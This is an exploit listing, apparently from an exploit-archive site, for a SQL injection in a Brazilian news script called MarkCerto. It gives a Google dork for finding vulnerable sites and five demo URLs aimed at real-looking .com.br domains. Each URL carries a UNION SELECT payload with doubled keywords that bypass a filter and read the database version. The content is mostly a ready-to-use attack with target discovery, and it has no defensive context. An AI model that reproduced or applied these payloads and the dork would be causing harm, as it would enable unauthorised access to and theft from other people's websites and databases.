MarkCerto SQL Injection

2014.03.04
Credit: Wild Wolves Team
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: inurl:\"noticias-look.php?noticia=\"

############################################################################ # Exploit Title: MarkCerto SQL Injection # Date: 04/03/2014 # Exploit Author: Wild Wolves Team # Vendor Homepage: http://www.markcerto.com.br/ # Tested on: Win XP,Linux ############################################################################ # Google Dork: inurl:"noticias-look.php?noticia=" ############################################################################ # DemO: http://www.cdpeXma.com.br/noticias-look.php?noticia=396+uniunionon+selselectect+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15-- # DemO: http://www.dedXetizadoravalera.com.br/noticias-look.php?noticia=7+uniunionon+selselectect+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15-- # DemO: http://www.cidoXferramentas.com.br/noticias-look.php?noticia=23+uniunionon+selselectect+1,2,3,4,version(),6,7,8,9,10,11,12,13,14-- # DemO: http://www.athXia.com.br/noticias-look.php?noticia=117+uniunionon+selselectect+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16-- # DemO: http://www.grupoXathia.com.br/noticias-look.php?noticia=121+uniunionon+selselectect+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16-- ############################################################################ # Special Tnx: Sub0Hack And All Hidden Name! ############################################################################ # The Last One : My Self, R3veC0der ############################################################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top